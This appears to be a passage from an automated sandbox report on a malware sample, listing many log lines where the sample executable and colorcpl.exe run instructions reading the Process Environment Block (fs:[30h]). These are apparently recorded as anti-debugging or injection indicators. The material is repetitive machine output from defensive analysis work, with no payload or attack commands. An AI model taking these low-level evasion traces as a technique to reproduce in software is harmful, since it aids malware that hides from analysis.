          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6E730 mov eax, dword ptr fs:[00000030h]1_2_00B6E730
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B34F2E mov eax, dword ptr fs:[00000030h]1_2_00B34F2E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B34F2E mov eax, dword ptr fs:[00000030h]1_2_00B34F2E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5F716 mov eax, dword ptr fs:[00000030h]1_2_00B5F716
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C08F6A mov eax, dword ptr fs:[00000030h]1_2_00C08F6A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCFF10 mov eax, dword ptr fs:[00000030h]1_2_00BCFF10
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCFF10 mov eax, dword ptr fs:[00000030h]1_2_00BCFF10
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A70E mov eax, dword ptr fs:[00000030h]1_2_00B6A70E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A70E mov eax, dword ptr fs:[00000030h]1_2_00B6A70E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C0070D mov eax, dword ptr fs:[00000030h]1_2_00C0070D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C0070D mov eax, dword ptr fs:[00000030h]1_2_00C0070D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4FF60 mov eax, dword ptr fs:[00000030h]1_2_00B4FF60
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4EF40 mov eax, dword ptr fs:[00000030h]1_2_00B4EF40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD14FB mov eax, dword ptr fs:[00000030h]7_2_04FD14FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96CF0 mov eax, dword ptr fs:[00000030h]7_2_04F96CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96CF0 mov eax, dword ptr fs:[00000030h]7_2_04F96CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96CF0 mov eax, dword ptr fs:[00000030h]7_2_04F96CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE8CD6 mov eax, dword ptr fs:[00000030h]7_2_04FE8CD6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2849B mov eax, dword ptr fs:[00000030h]7_2_04F2849B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3746D mov eax, dword ptr fs:[00000030h]7_2_04F3746D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAC450 mov eax, dword ptr fs:[00000030h]7_2_04FAC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAC450 mov eax, dword ptr fs:[00000030h]7_2_04FAC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4A44B mov eax, dword ptr fs:[00000030h]7_2_04F4A44B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4BC2C mov eax, dword ptr fs:[00000030h]7_2_04F4BC2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE740D mov eax, dword ptr fs:[00000030h]7_2_04FE740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE740D mov eax, dword ptr fs:[00000030h]7_2_04FE740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE740D mov eax, dword ptr fs:[00000030h]7_2_04FE740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96C0A mov eax, dword ptr fs:[00000030h]7_2_04F96C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96C0A mov eax, dword ptr fs:[00000030h]7_2_04F96C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96C0A mov eax, dword ptr fs:[00000030h]7_2_04F96C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96C0A mov eax, dword ptr fs:[00000030h]7_2_04F96C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]7_2_04FD1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FC8DF1 mov eax, dword ptr fs:[00000030h]7_2_04FC8DF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2D5E0 mov eax, dword ptr fs:[00000030h]7_2_04F2D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2D5E0 mov eax, dword ptr fs:[00000030h]7_2_04F2D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDFDE2 mov eax, dword ptr fs:[00000030h]7_2_04FDFDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDFDE2 mov eax, dword ptr fs:[00000030h]7_2_04FDFDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDFDE2 mov eax, dword ptr fs:[00000030h]7_2_04FDFDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDFDE2 mov eax, dword ptr fs:[00000030h]7_2_04FDFDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]7_2_04F96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]7_2_04F96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]7_2_04F96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96DC9 mov ecx, dword ptr fs:[00000030h]7_2_04F96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]7_2_04F96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]7_2_04F96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F41DB5 mov eax, dword ptr fs:[00000030h]7_2_04F41DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F41DB5 mov eax, dword ptr fs:[00000030h]7_2_04F41DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F41DB5 mov eax, dword ptr fs:[00000030h]7_2_04F41DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE05AC mov eax, dword ptr fs:[00000030h]7_2_04FE05AC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE05AC mov eax, dword ptr fs:[00000030h]7_2_04FE05AC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F435A1 mov eax, dword ptr fs:[00000030h]7_2_04F435A1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4FD9B mov eax, dword ptr fs:[00000030h]7_2_04F4FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4FD9B mov eax, dword ptr fs:[00000030h]7_2_04F4FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42581 mov eax, dword ptr fs:[00000030h]7_2_04F42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42581 mov eax, dword ptr fs:[00000030h]7_2_04F42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42581 mov eax, dword ptr fs:[00000030h]7_2_04F42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42581 mov eax, dword ptr fs:[00000030h]7_2_04F42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]7_2_04F12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]7_2_04F12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]7_2_04F12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]7_2_04F12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]7_2_04F12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3C577 mov eax, dword ptr fs:[00000030h]7_2_04F3C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3C577 mov eax, dword ptr fs:[00000030h]7_2_04F3C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F37D50 mov eax, dword ptr fs:[00000030h]7_2_04F37D50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F53D43 mov eax, dword ptr fs:[00000030h]7_2_04F53D43
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F93540 mov eax, dword ptr fs:[00000030h]7_2_04F93540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FC3D40 mov eax, dword ptr fs:[00000030h]7_2_04FC3D40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1AD30 mov eax, dword ptr fs:[00000030h]7_2_04F1AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDE539 mov eax, dword ptr fs:[00000030h]7_2_04FDE539
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]7_2_04F23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE8D34 mov eax, dword ptr fs:[00000030h]7_2_04FE8D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F9A537 mov eax, dword ptr fs:[00000030h]7_2_04F9A537
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F44D3B mov eax, dword ptr fs:[00000030h]7_2_04F44D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F44D3B mov eax, dword ptr fs:[00000030h]7_2_04F44D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F44D3B mov eax, dword ptr fs:[00000030h]7_2_04F44D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F276E2 mov eax, dword ptr fs:[00000030h]7_2_04F276E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F416E0 mov ecx, dword ptr fs:[00000030h]7_2_04F416E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE8ED6 mov eax, dword ptr fs:[00000030h]7_2_04FE8ED6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F58EC7 mov eax, dword ptr fs:[00000030h]7_2_04F58EC7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F436CC mov eax, dword ptr fs:[00000030h]7_2_04F436CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FCFEC0 mov eax, dword ptr fs:[00000030h]7_2_04FCFEC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE0EA5 mov eax, dword ptr fs:[00000030h]7_2_04FE0EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE0EA5 mov eax, dword ptr fs:[00000030h]7_2_04FE0EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE0EA5 mov eax, dword ptr fs:[00000030h]7_2_04FE0EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F946A7 mov eax, dword ptr fs:[00000030h]7_2_04F946A7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAFE87 mov eax, dword ptr fs:[00000030h]7_2_04FAFE87
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]7_2_04F3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]7_2_04F3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]7_2_04F3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]7_2_04F3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]7_2_04F3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2766D mov eax, dword ptr fs:[00000030h]7_2_04F2766D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]7_2_04F27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]7_2_04F27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]7_2_04F27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]7_2_04F27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]7_2_04F27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]7_2_04F27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDAE44 mov eax, dword ptr fs:[00000030h]7_2_04FDAE44
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDAE44 mov eax, dword ptr fs:[00000030h]7_2_04FDAE44
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FCFE3F mov eax, dword ptr fs:[00000030h]7_2_04FCFE3F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1E620 mov eax, dword ptr fs:[00000030h]7_2_04F1E620
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4A61C mov eax, dword ptr fs:[00000030h]7_2_04F4A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4A61C mov eax, dword ptr fs:[00000030h]7_2_04F4A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1C600 mov eax, dword ptr fs:[00000030h]7_2_04F1C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1C600 mov eax, dword ptr fs:[00000030h]7_2_04F1C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1C600 mov eax, dword ptr fs:[00000030h]7_2_04F1C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F48E00 mov eax, dword ptr fs:[00000030h]7_2_04F48E00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD1608 mov eax, dword ptr fs:[00000030h]7_2_04FD1608
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F537F5 mov eax, dword ptr fs:[00000030h]7_2_04F537F5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F28794 mov eax, dword ptr fs:[00000030h]7_2_04F28794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F97794 mov eax, dword ptr fs:[00000030h]7_2_04F97794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F97794 mov eax, dword ptr fs:[00000030h]7_2_04F97794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F97794 mov eax, dword ptr fs:[00000030h]7_2_04F97794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2FF60 mov eax, dword ptr fs:[00000030h]7_2_04F2FF60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE8F6A mov eax, dword ptr fs:[00000030h]7_2_04FE8F6A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2EF40 mov eax, dword ptr fs:[00000030h]7_2_04F2EF40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4E730 mov eax, dword ptr fs:[00000030h]7_2_04F4E730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F14F2E mov eax, dword ptr fs:[00000030h]7_2_04F14F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F14F2E mov eax, dword ptr fs:[00000030h]7_2_04F14F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3F716 mov eax, dword ptr fs:[00000030h]7_2_04F3F716
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAFF10 mov eax, dword ptr fs:[00000030h]7_2_04FAFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAFF10 mov eax, dword ptr fs:[00000030h]7_2_04FAFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE070D mov eax, dword ptr fs:[00000030h]7_2_04FE070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE070D mov eax, dword ptr fs:[00000030h]7_2_04FE070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4A70E mov eax, dword ptr fs:[00000030h]7_2_04F4A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4A70E mov eax, dword ptr fs:[00000030h]7_2_04F4A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F140E1 mov eax, dword ptr fs:[00000030h]7_2_04F140E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F140E1 mov eax, dword ptr fs:[00000030h]7_2_04F140E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F140E1 mov eax, dword ptr fs:[00000030h]7_2_04F140E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F158EC mov eax, dword ptr fs:[00000030h]7_2_04F158EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]7_2_04FAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAB8D0 mov ecx, dword ptr fs:[00000030h]7_2_04FAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]7_2_04FAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]7_2_04FAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]7_2_04FAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]7_2_04FAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4F0BF mov ecx, dword ptr fs:[00000030h]7_2_04F4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4F0BF mov eax, dword ptr fs:[00000030h]7_2_04F4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4F0BF mov eax, dword ptr fs:[00000030h]7_2_04F4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F590AF mov eax, dword ptr fs:[00000030h]7_2_04F590AF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F19080 mov eax, dword ptr fs:[00000030h]7_2_04F19080
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F93884 mov eax, dword ptr fs:[00000030h]7_2_04F93884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F93884 mov eax, dword ptr fs:[00000030h]7_2_04F93884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE1074 mov eax, dword ptr fs:[00000030h]7_2_04FE1074
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD2073 mov eax, dword ptr fs:[00000030h]7_2_04FD2073
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F30050 mov eax, dword ptr fs:[00000030h]7_2_04F30050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F30050 mov eax, dword ptr fs:[00000030h]7_2_04F30050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2B02A mov eax, dword ptr fs:[00000030h]7_2_04F2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2B02A mov eax, dword ptr fs:[00000030h]7_2_04F2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2B02A mov eax, dword ptr fs:[00000030h]7_2_04F2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2B02A mov eax, dword ptr fs:[00000030h]7_2_04F2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE4015 mov eax, dword ptr fs:[00000030h]7_2_04FE4015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE4015 mov eax, dword ptr fs:[00000030h]7_2_04FE4015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F97016 mov eax, dword ptr fs:[00000030h]7_2_04F97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F97016 mov eax, dword ptr fs:[00000030h]7_2_04F97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F97016 mov eax, dword ptr fs:[00000030h]7_2_04F97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B1E1 mov eax, dword ptr fs:[00000030h]7_2_04F1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B1E1 mov eax, dword ptr fs:[00000030h]7_2_04F1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B1E1 mov eax, dword ptr fs:[00000030h]7_2_04F1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FA41E8 mov eax, dword ptr fs:[00000030h]7_2_04FA41E8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F951BE mov eax, dword ptr fs:[00000030h]7_2_04F951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F951BE mov eax, dword ptr fs:[00000030h]7_2_04F951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F951BE mov eax, dword ptr fs:[00000030h]7_2_04F951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F951BE mov eax, dword ptr fs:[00000030h]7_2_04F951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F461A0 mov eax, dword ptr fs:[00000030h]7_2_04F461A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F461A0 mov eax, dword ptr fs:[00000030h]7_2_04F461A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD49A4 mov eax, dword ptr fs:[00000030h]7_2_04FD49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD49A4 mov eax, dword ptr fs:[00000030h]7_2_04FD49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD49A4 mov eax, dword ptr fs:[00000030h]7_2_04FD49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD49A4 mov eax, dword ptr fs:[00000030h]7_2_04FD49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F969A6 mov eax, dword ptr fs:[00000030h]7_2_04F969A6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42990 mov eax, dword ptr fs:[00000030h]7_2_04F42990
